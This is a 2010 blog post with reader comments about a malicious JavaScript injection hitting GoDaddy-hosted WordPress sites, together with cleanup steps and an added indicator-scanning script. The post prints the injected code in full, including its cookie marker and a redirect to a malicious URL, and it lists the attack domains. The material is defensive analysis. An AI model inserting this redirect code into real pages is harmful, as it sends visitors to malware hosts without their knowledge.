Posted: May 12th, 2010    By: Devin Walker   

Have you gotten calls from your clients hosted on GoDaddy about their WordPress sites being 'hacked'? Or perhaps this happened to you yourself. It seems there's a new report of thousands of WordPress sites being infected by malicious JavaScript inserted into their WordPress websites.

It's not every day that WordPress gets 'hacked' by something or someone. Today one of my clients sent me a very distressed email claiming their site had been hacked. I thought that they were probably mistaken, but apparently not. It appears that a malicious piece of JavaScript is infecting WordPress sites, most, if not all, hosted on WordPress. This WordPress infection by 'holasionweb.com' appears to set a cookie and has ill intentions. Let's take a look at what this attack is and how to fix it.

What WordPress Versions are Potentially Infected?

This has been seen on versions up to WordPress version 2.9.2.

What Does it Do to My WordPress FrontEnd?

Nothing much. You may not see any change at all unless you have a virus protection program installed and it raises a flag when you go to your site in the browser.

What About the WordPress Admin Area?

This is where you will notice something has gone wrong. Take a look at this screenshot:

[Screenshot: WordPress Hacked by Malicious JavaScript]

You can immediately tell there's something wrong here.

What Does the Malicious Code Look Like?

Here's a look at the malicious code:
function setCookie(c_name,value,expiredays){
	var exdate=new Date();
	exdate.setDate(exdate.getDate()+expiredays);
	document.cookie=c_name+ "=" +escape(value)+
	((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
}


function getCookie(c_name){
if (document.cookie.length>0)
  {
  c_start=document.cookie.indexOf(c_name + "=");
  if (c_start!=-1)
    {
    c_start=c_start + c_name.length+1;
    c_end=document.cookie.indexOf(";",c_start);
    if (c_end==-1) c_end=document.cookie.length;
    return unescape(document.cookie.substring(c_start,c_end));
    }
  }
return "";
}


var name=getCookie("pma_visited_theme1");
if (name==""){
	setCookie("pma_visited_theme1","1",20);
	var url="http://www4.suitcase52td.net/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG2dXseYlWibZmeWmQ%3D%3D";
	window.top.location.replace(url);
}else{


}

Take a look at the script above; this is the problem.

Ok, So How Do I Fix the 'HolasionWeb' WordPress GoDaddy Issue?!

Download this fix that will detect the script on your site and get rid of it: Download HoliasionWeb.com Malicious Script WordPress Fix

Instructions for running the WordPress hack fix

  1. Unzip and upload the PHP file via FTP to your home directory
  2. Navigate your browser to http://mywebsite.com/wordpress-fix.php, where 'mywebsite' is your domain, to start the fix. Note: the fix may take a few minutes to run
  3. When it says complete, check to see if it's actually fixed and you're good to go!

Here's a link to the original solution: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

This seems to have worked for my instance. Here's the link to the release that tipped me off on this:

  http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html
  http://sucuri.net/malware/entry/MW:MROBH:1

Other domains where this malicious script has been:

  http://www.indesignstudioinfo.com/ls.php
  http://zettapetta.com/js.php
  http://holasionweb.com/oo.php
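
One way to do the "check to see if it's actually fixed" step against the hosts and cookie name shown in this post, as an added example (not code from the original post or from the Sucuri fix). It assumes the injection appears in the served HTML as a script tag pointing at one of the listed hosts or as inline code like the script above; the function names and sample pages are constructed.

```javascript
// Added example: flags the indicators named in this post inside a page's HTML.
// Hosts and cookie name come from the post; sample pages below are constructed.
const BAD_HOSTS = ['holasionweb.com', 'indesignstudioinfo.com', 'zettapetta.com', 'suitcase52td.net'];
const INLINE_MARKERS = [
  { id: 'cookie-marker', re: /pma_visited_theme1/ },
  { id: 'top-frame-redirect', re: /window\.top\.location\.replace\s*\(/ },
];

// True when host is a listed domain or a subdomain of one (e.g. www4.suitcase52td.net).
function isListedHost(host) {
  const h = host.toLowerCase().replace(/\.$/, '');
  return BAD_HOSTS.some((d) => h === d || h.endsWith('.' + d));
}

// Returns [{type, detail}] for every indicator found in one HTML document.
function scanHtml(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    if (src) {
      const raw = (src[1] ?? src[2] ?? src[3]).trim();
      try {
        // Relative and protocol-relative URLs resolve against a placeholder base.
        const host = new URL(raw, 'http://site.invalid/').hostname;
        if (isListedHost(host)) findings.push({ type: 'external-script', detail: raw });
      } catch (e) {
        findings.push({ type: 'unparseable-src', detail: raw });
      }
    }
    // Inline bodies are checked for the cookie name and the top-frame redirect call.
    for (const { id, re } of INLINE_MARKERS) {
      if (re.test(body)) findings.push({ type: id, detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample pages (not captured from a real site).
const SAMPLES = {
  infected: '<html><body><p>Hi</p><SCRIPT src="http://HolasionWeb.com/oo.php"></SCRIPT></body></html>',
  inline: '<script>var name=getCookie("pma_visited_theme1"); if(name==""){window.top.location.replace(url);}</script>',
  clean: '<script src="/wp-includes/js/jquery/jquery.js"></script><script>var holasionweb_note = 1;</script>',
};

for (const [name, html] of Object.entries(SAMPLES)) console.log(name, scanHtml(html));
```

An empty result only means these particular indicators are absent from the HTML that was scanned; check both front-end and admin pages, since the post notes the admin area is where the change is visible.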

Lesson Here: Do Not Host with Go Daddy!

They are insecure, unreliable and have terrible support.


8 Responses to 'GoDaddy WordPress Sites Infected by HolasionWeb Malicious Code'

  1. Not only WordPress!! Our Joomla site was hacked by the same guy (indesignstudioinfo.com).
    I couldn’t believe it when users informed me.
    I found all PHP files infected with a piece of encoded text. I mean all PHP files.
    So I deleted everything and replaced them with a clean backup. I would like to mention that after many years hosting with GoDaddy, this was the first time that something like this happened. And fortunately, GoDaddy keeps history files. So I found that the infection took place on 7 May 2010 and I did a replace with an older timestamp.
    I would like to ask why somebody doesn’t shut down this site?

    Nick

    14 May 10 at 9:39 am

  2. Got infected as well but I removed it successfully.

    You may check this solution:

    http://www.klinkoo.com/blog/index.php?blog=2

    Eric Sebastien

    14 May 10 at 8:58 pm

  3. Thanks so much for sharing this script. It has helped me get back live after 1 week of RND.

    Amit Desai

    20 May 10 at 9:18 am

  4. You’re welcome!

    Devin Walker

    20 May 10 at 8:32 pm

  5. Thanks so much for your fix, I was pulling my hair out with this code.

    Mark

    28 May 10 at 10:21 am

  6. We have a site that isn’t Joomla or WordPress and it was victim of the same hack! Why is GoDaddy not letting users know about this???

    Z

    10 Jun 10 at 1:42 pm

  7. Because GoDaddy is only good as a domain reg site, not a host.

    Devin Walker

    11 Jun 10 at 9:04 pm
